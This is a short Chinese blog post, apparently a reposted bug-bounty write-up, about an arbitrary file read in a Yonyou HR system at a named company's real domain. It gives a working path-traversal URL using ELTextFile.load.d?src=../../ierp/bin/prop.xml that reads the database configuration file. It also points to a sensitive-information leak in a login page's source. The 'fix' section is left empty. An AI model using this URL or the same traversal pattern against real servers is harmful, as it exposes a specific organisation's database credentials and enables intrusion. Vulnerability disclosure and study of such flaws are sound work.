用友某系统任意文件读取 – 网站安全 – 自学php

时间: 2020-10-11|tag: 18次围观|0 条评论

用友某系统任意文件,就拿某期的众测举例

https://hr.minshengec.cn/hrss/login.jsp 地址

查看源代码
 

用友某系统任意文件读取 – 网站安全 – 自学php插图

http://wenku.baidu.com/view/252b4448e518964bcf847ccb?fr=prin 百度到了配置文件

然后慢慢构造

https://hr.minshengec.cn/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml

读取到了数据库
 

用友某系统任意文件读取 – 网站安全 – 自学php插图1

还有一个敏感信息泄露

https://hr.minshengec.cn/login.jsp

查看源代码

 

用友某系统任意文件读取 – 网站安全 – 自学php插图2

 

修复方案:

怎么修复呢?
    上一篇: 某电子邮件客户端软件本地XSS漏洞 - 网站安全

    下一篇: 编程中国论坛sql注入可获取Webshell - 网站安全 -
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《用友某系统任意文件读取 – 网站安全 – 自学php
   

还没有人抢沙发呢~